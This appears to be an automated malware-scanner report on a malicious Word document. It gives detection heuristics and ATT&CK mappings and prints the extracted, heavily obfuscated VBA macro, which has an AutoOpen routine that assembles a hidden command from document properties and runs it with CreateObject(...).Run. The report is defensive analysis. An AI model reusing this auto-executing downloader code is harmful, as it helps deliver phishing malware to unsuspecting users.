MALICIOUS
192
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1105 Ingress Tool Transfer
The sample is a malicious Office document containing a VBA macro. Heuristics indicate the presence of an auto-executing macro ('autoopen') that uses 'CreateObject' to likely download and execute a second-stage payload, as suggested by the ClamAV signature 'Doc.Macro.VBSDownloader-6336817-0'. The VBA macro itself is heavily obfuscated, but its structure and the heuristic firings strongly suggest a downloader functionality.
Heuristics 8
-
ClamAV: Doc.Macro.VBSDownloader-6336817-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.VBSDownloader-6336817-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
hCmKFBfWmE = "yCwPaXvdBkA" CreateObject(DGVuXEDvC + GGeYpdzkeM("nydmPfzx") + GGeYpdzkeM("drcbPKyTuXc")).Run$ yWfzXCLRL + cxPabABMcr + bTFXznUbtc + fYDrYUnsPW + pKrXrHXYXEW + PVLbswKckfa, 0 MEembHVxzx = "rupHwEnskFY" -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub autoopen() SEWfmEPmHBD -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10086 bytes |
SHA-256: 958723df6a095070f80dc4d850123fa3f28636883d8934287e3d6ce8c8eb2780 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
235 of 275 identifiers look randomly generated (e.g. 'UMKDLgDUKvd') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Function UuWGcCKmm()
Dim kSdCGKtvftA()
TPZkbBcCd = 7693
ReDim kSdCGKtvftA(7693)
kSdCGKtvftA(4023) = YMgAfUPC
kSdCGKtvftA(6846) = tskVCYKZ
kSdCGKtvftA(4329) = 432
kSdCGKtvftA(3548) = 5597
kSdCGKtvftA(4625) = 5448
kSdCGKtvftA(2176) = 4280
For TPZkbBcCd = 3514 To 3656
kSdCGKtvftA(TPZkbBcCd) = TPZkbBcCd
Next
End Function
Function nnfGeycE()
Dim wHvWLyCCL()
DnExBHxRyfp = 8655
ReDim wHvWLyCCL(8655)
wHvWLyCCL(3795) = PzCMcVcgnh
wHvWLyCCL(7209) = xztUgbFWDCL
wHvWLyCCL(6882) = TRNmmsArVhW
wHvWLyCCL(2806) = pbBHkrSdTMe
wHvWLyCCL(2583) = 7295
wHvWLyCCL(1945) = 5468
wHvWLyCCL(738) = 9279
wHvWLyCCL(4941) = 7633
wHvWLyCCL(1137) = 3166
wHvWLyCCL(1210) = 5447
For DnExBHxRyfp = 5741 To 261
wHvWLyCCL(DnExBHxRyfp) = DnExBHxRyfp
Next
End Function
Function RZYYtdsM()
Dim LeHYbnYspZ()
sgNrVGUwG = 7163
ReDim LeHYbnYspZ(7163)
LeHYbnYspZ(6409) = SVvmkMBg
LeHYbnYspZ(2948) = RdmThCHmTL
LeHYbnYspZ(2082) = LdWNekGrLw
LeHYbnYspZ(6783) = LsMsgBGyRb
LeHYbnYspZ(7054) = WTFzMExVy
LeHYbnYspZ(6152) = gsafKsLKTYr
LeHYbnYspZ(5268) = 3291
LeHYbnYspZ(346) = 278
LeHYbnYspZ(487) = 6849
For sgNrVGUwG = 6927 To 5687
LeHYbnYspZ(sgNrVGUwG) = sgNrVGUwG
Next
End Function
Function hZsSvuuLN()
Dim WbvUBcPhR()
DfVfApYTMpS = 5773
ReDim WbvUBcPhR(5773)
WbvUBcPhR(4737) = aeCevfdRve
WbvUBcPhR(5411) = wsyYvTeT
WbvUBcPhR(5427) = wpXgmMULn
WbvUBcPhR(3091) = 384
WbvUBcPhR(1600) = 9103
WbvUBcPhR(2853) = 9593
For DfVfApYTMpS = 3128 To 410
WbvUBcPhR(DfVfApYTMpS) = DfVfApYTMpS
Next
End Function
Function HeeUEhda()
Dim SkCRBzTNKkZ()
rGPpRNaR = 6882
ReDim SkCRBzTNKkZ(6882)
SkCRBzTNKkZ(1649) = fvtEMUAruuY
SkCRBzTNKkZ(1977) = gSSheHkUPD
SkCRBzTNKkZ(3057) = RHmhhTzWPKr
SkCRBzTNKkZ(1459) = 8296
SkCRBzTNKkZ(2652) = 1995
For rGPpRNaR = 3667 To 1519
SkCRBzTNKkZ(rGPpRNaR) = rGPpRNaR
Next
End Function
Function bsEWmzMcdBe()
Dim CvXcKFfE()
xZARnFmnKK = 9349
ReDim CvXcKFfE(9349)
CvXcKFfE(1894) = tzheUEHKB
CvXcKFfE(9226) = eEFPAmvs
CvXcKFfE(7353) = fyTuKpgs
CvXcKFfE(1583) = APhvZMFa
CvXcKFfE(3344) = hSxwwPdFEMr
CvXcKFfE(4620) = 4269
CvXcKFfE(6711) = 8144
CvXcKFfE(6355) = 4741
CvXcKFfE(6902) = 5694
CvXcKFfE(5980) = 167
CvXcKFfE(5369) = 6975
For xZARnFmnKK = 9298 To 1013
CvXcKFfE(xZARnFmnKK) = xZARnFmnKK
Next
End Function
Function zNpvdYtuxWc()
Dim pNDdndaTme()
uKtRmAEVPeB = 665
ReDim pNDdndaTme(665)
pNDdndaTme(109) = KtxVVDXX
pNDdndaTme(222) = LrLKszrX
pNDdndaTme(582) = PzGLGcxAa
pNDdndaTme(458) = PWenwNyU
pNDdndaTme(280) = 5113
pNDdndaTme(193) = 8710
pNDdndaTme(630) = 7182
pNDdndaTme(605) = 6362
pNDdndaTme(587) = 4716
pNDdndaTme(227) = 7107
For uKtRmAEVPeB = 561 To 174
pNDdndaTme(uKtRmAEVPeB) = uKtRmAEVPeB
Next
End Function
Function vcvVFmHrhmB()
Dim nVbNtczP()
mhDyWwhahX = 6402
ReDim nVbNtczP(6402)
nVbNtczP(4696) = CkzygCgDzZb
nVbNtczP(1875) = zWKnYBByaWs
nVbNtczP(1550) = kLTBAXEWszx
nVbNtczP(5133) = 7583
nVbNtczP(5891) = 8940
nVbNtczP(4413) = 2627
nVbNtczP(6249) = 3938
nVbNtczP(2793) = 9756
For mhDyWwhahX = 2505 To 5149
nVbNtczP(mhDyWwhahX) = mhDyWwhahX
Next
End Function
Function eGWaDsAyChp()
Dim hzZYGBpHP()
NMWcebCs = 4857
ReDim hzZYGBpHP(4857)
hzZYGBpHP(2256) = VsXBYryVaSF
hzZYGBpHP(2623) = fzLswewUWF
hzZYGBpHP(3235) = AtWvtbUkWxf
hzZYGBpHP(1792) = yvVETnsctaW
hzZYGBpHP(1580) = nMwxXYRxB
hzZYGBpHP(2536) = 3693
hzZYGBpHP(102) = 5824
hzZYGBpHP(2209) = 4767
hzZYGBpHP(3984) = 1537
hzZYGBpHP(2028) = 2006
hzZYGBpHP(3499) = 5860
For NMWcebCs = 4007 To 2149
hzZYGBpHP(NMWcebCs) = NMWcebCs
Next
End Function
Sub autoopen()
SEWfmEPmHBD
End Sub
Public Function GGeYpdzkeM(fBdFXvMtWT)
hTZSUBMTAp = "sGsbdLrufp"
etpVGVum = "mETgKbgsHUe"
RbuVtvzvn = "bHHAUnMrXF"
sGLckvMGP = "rBVUkYByC"
wtfFFppf = "uFveWEEEaY"
epuRGHUUy = "XrtpPEBA"
BEptVXeVF = "WmWccFVD"
RFWVXGGk = "WuAcsYwfLk"
GGeYpdzkeM = ActiveDocument.CustomDocumentProperties(fBdFXvMtWT) + cxPabABMcr + bTFXznUbtc + fYDrYUnsPW + pKrXrHXYXEW + fAFfTtLxGWk
pGbUGMfsW = "GsGLRHSZF"
aFghZswaEER = "GmCnPwLCyeX"
pTbhZFbtdk = "FYCKbrgUkR"
wrTCDkNVL = "ksPMFZzVSv"
ddsGyCeGCy = "gmTYWTbcK"
VrcpSuxkS = "RzGpHkrdTvW"
EVvySgLv = "YMzaDpeArN"
WNzYVGXkpb = "MTrKbHsu"
End Function
Public Function yWfzXCLRL()
mKVetctGMYn = "yrKYdwEpzf"
wsPdXayTZRw = "TDDgmTTyRx"
bDPkHxMmhZ = "uMcTbpnk"
NYDBXAXVeyM = "TESuhLABY"
mPhwykaRdnT = GGeYpdzkeM("pVesNMDD") + cxPabABMcr + bTFXznUbtc + fYDrYUnsPW + pKrXrHXYXEW + GGeYpdzkeM("dNWBxeLpvh") + GGeYpdzkeM("CpGEXgyr") + GGeYpdzkeM("aLVULngBk")
sFnZRZPcH = "PDbZUMVXHt"
EASVYTff = "LwZMCcPwzKr"
pGNgeMpZKDC = "pfVfhKYYar"
wVutHFFGf = "MGeCRRmVY"
vUHWEKHTFgR = "dYXSfeKPyhP"
bBWBsxvZC = GGeYpdzkeM("wFvScDNrcD") + GGeYpdzkeM("NYYUbSvw") + GGeYpdzkeM("HmgKxtsXwWn") + GGeYpdzkeM("rxNWFLuZNW") + GGeYpdzkeM("fLgpEEPySWS")
zCxWFrktb = bBWBsxvZC + mPhwykaRdnT
SUYXaKFEUuW = "MSTnMrBu"
kKZgRMfZfU = "hWYzZzxYG"
EAfvZZTzZZc = "RfevhmkpG"
kDXxBakP = "FMAfwvcMZ"
bypkzXrdVG = "kyKpzZuu"
cxKFcMZBw = "bkzKKuWegtf"
swBKwKeaG = "bDkeumaG"
yWfzXCLRL = zCxWFrktb + ActiveDocument.BuiltInDocumentProperties("Comments") + ""
End Function
Public Function DGVuXEDvC()
DGVuXEDvC = GGeYpdzkeM("yNNaEaEaNwC") + GGeYpdzkeM("WkZhErcT") + GGeYpdzkeM("eXnFgAWpc") + cxPabABMcr + bTFXznUbtc + fYDrYUnsPW + pKrXrHXYXEW + LFCMtdME
ybtCwxsYME = "dwvYYCNkwH"
VPtAHYYE = "eDukLMCZ"
HLnDkgEB = "LKWRytBKLr"
gHubZGfS = "SRaEWtypnc"
KETmkAzVKG = "NhSeLKsVgb"
rWxTmwpdyxY = "UMKDLgDUKvd"
GtnsxVnwwWz = "myrkrBZyf"
nxewRZDYvc = "LNzEbhvez"
End Function
Public Function SEWfmEPmHBD()
GfutSEbC = "WLAgFBWXS"
hCmKFBfWmE = "yCwPaXvdBkA"
CreateObject(DGVuXEDvC + GGeYpdzkeM("nydmPfzx") + GGeYpdzkeM("drcbPKyTuXc")).Run$ yWfzXCLRL + cxPabABMcr + bTFXznUbtc + fYDrYUnsPW + pKrXrHXYXEW + PVLbswKckfa, 0
MEembHVxzx = "rupHwEnskFY"
KpeGBCCgUK = "nMRgtsuC"
XgyNuUwXDHc = "DEmanafDgp"
wmGykMxYtaX = "GfbhYMeU"
kDVzduac = "GrByEmpbpck"
nbYSaWpPm = "XAPTCMSeYA"
bnfHpKELGK = "RxnUsradM"
GpZFzNEbX = "NDVYKYmLzgM"
End Function
Function EkWGTpmUsXR()
Dim XgvwtwGkp()
GhfLaHkTgus = 3246
ReDim XgvwtwGkp(3246)
XgvwtwGkp(2395) = UNEspXYY
XgvwtwGkp(654) = UpCTgvecf
XgvwtwGkp(2967) = WRmrtbDs
XgvwtwGkp(1343) = nSruxddRGPx
XgvwtwGkp(273) = vCLPuXNp
XgvwtwGkp(1449) = 7419
XgvwtwGkp(3080) = 2346
XgvwtwGkp(1852) = 8347
XgvwtwGkp(2841) = 3943
XgvwtwGkp(1911) = 7688
XgvwtwGkp(3036) = 1371
For GhfLaHkTgus = 2645 To 214
XgvwtwGkp(GhfLaHkTgus) = GhfLaHkTgus
Next
End Function
Function hdXSENYcU()
Dim zKwScAKM()
LTGugrSXf = 8982
ReDim zKwScAKM(8982)
zKwScAKM(4706) = FAnLpFWpCLC
zKwScAKM(4294) = wPwvHEEZpV
zKwScAKM(8189) = ZWwRgvAExG
zKwScAKM(1571) = GAtpWWVc
zKwScAKM(8382) = 8495
zKwScAKM(6757) = 7115
For LTGugrSXf = 3055 To 8866
zKwScAKM(LTGugrSXf) = LTGugrSXf
Next
End Function
Function ZztYaWcC()
Dim WUVbNddg()
BtFmVMSZwLm = 9622
ReDim WUVbNddg(9622)
WUVbNddg(7816) = eKxWATFh
WUVbNddg(6799) = ZKHVsvvP
WUVbNddg(270) = 6448
WUVbNddg(7474) = 1367
For BtFmVMSZwLm = 4073 To 6257
WUVbNddg(BtFmVMSZwLm) = BtFmVMSZwLm
Next
End Function
Function XrcPySkKE()
Dim CPhcUGXuTZx()
vNVdMHTYbY = 7775
ReDim CPhcUGXuTZx(7775)
CPhcUGXuTZx(1299) = HKzBzRLn
CPhcUGXuTZx(3827) = bpgvSXXW
CPhcUGXuTZx(671) = cWBPpkcDSyt
CPhcUGXuTZx(3438) = hfvVwdNuHN
CPhcUGXuTZx(7210) = hemPwEdRd
CPhcUGXuTZx(1480) = 4486
CPhcUGXuTZx(3056) = 9935
CPhcUGXuTZx(4716) = 2964
CPhcUGXuTZx(2311) = 6556
CPhcUGXuTZx(4191) = 6614
CPhcUGXuTZx(1281) = 5481
For vNVdMHTYbY = 586 To 7250
CPhcUGXuTZx(vNVdMHTYbY) = vNVdMHTYbY
Next
End Function
Function FAfkgkZX()
Dim GLvUdNmBx()
tvagCGmBbhW = 2152
ReDim GLvUdNmBx(2152)
GLvUdNmBx(1217) = nHKzetXvs
GLvUdNmBx(1669) = gASccAAAkbX
GLvUdNmBx(2083) = CCdnLLVDt
GLvUdNmBx(511) = ncpkGKnk
GLvUdNmBx(1751) = PGWVuLAMC
GLvUdNmBx(1432) = BfSzSfSSns
GLvUdNmBx(2141) = 8278
GLvUdNmBx(528) = 7989
GLvUdNmBx(2083) = 3819
GLvUdNmBx(75) = 2190
GLvUdNmBx(910) = 1218
For tvagCGmBbhW = 1608 To 230
GLvUdNmBx(tvagCGmBbhW) = tvagCGmBbhW
Next
End Function
Function nbXrebyaC()
Dim sAebgYCbs()
XVFzPNRuCa = 2298
ReDim sAebgYCbs(2298)
sAebgYCbs(2159) = FUtamvXSFW
sAebgYCbs(1080) = LakeNvfEw
sAebgYCbs(255) = MXxUTAkSSF
sAebgYCbs(1978) = yMStUdAX
sAebgYCbs(193) = rmKrzgMszu
sAebgYCbs(1477) = 7362
sAebgYCbs(1983) = 985
sAebgYCbs(1896) = 2666
sAebgYCbs(873) = 3357
sAebgYCbs(1198) = 2412
For XVFzPNRuCa = 584 To 2101
sAebgYCbs(XVFzPNRuCa) = XVFzPNRuCa
Next
End Function
Function sKekEVXvLv()
Dim adrcTyWDU()
bfnDemYRp = 8138
ReDim adrcTyWDU(8138)
adrcTyWDU(2610) = mLapvgwVs
adrcTyWDU(4920) = fuPVrdUybX
adrcTyWDU(574) = WyzRKZTy
adrcTyWDU(6078) = wLwAaNCarF
adrcTyWDU(3191) = 6052
adrcTyWDU(992) = 192
adrcTyWDU(3840) = 9929
adrcTyWDU(5318) = 7084
adrcTyWDU(2567) = 9669
For bfnDemYRp = 6497 To 6377
adrcTyWDU(bfnDemYRp) = bfnDemYRp
Next
End Function
Function TDgzytVCRA()
Dim HVUAKyLg()
rhfZYSgHd = 3128
ReDim HVUAKyLg(3128)
HVUAKyLg(605) = HvnehNHWMAu
HVUAKyLg(2491) = fCeBpDURfba
HVUAKyLg(558) = 2588
HVUAKyLg(1699) = 1794
HVUAKyLg(692) = 9464
For rhfZYSgHd = 2836 To 1514
HVUAKyLg(rhfZYSgHd) = rhfZYSgHd
Next
End Function
Function nbsVuhDwLPy()
Dim HEWPwSKcEDh()
wBdwXuvMC = 8919
ReDim HEWPwSKcEDh(8919)
HEWPwSKcEDh(6895) = XVdgbXgEp
HEWPwSKcEDh(918) = HBXNZWbprd
HEWPwSKcEDh(4160) = vMxnynby
HEWPwSKcEDh(2434) = fNEaCnLrvw
HEWPwSKcEDh(5411) = 7538
HEWPwSKcEDh(512) = 8408
HEWPwSKcEDh(2106) = 2488
HEWPwSKcEDh(692) = 1794
HEWPwSKcEDh(7110) = 4916
HEWPwSKcEDh(573) = 4534
For wBdwXuvMC = 383 To 899
HEWPwSKcEDh(wBdwXuvMC) = wBdwXuvMC
Next
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.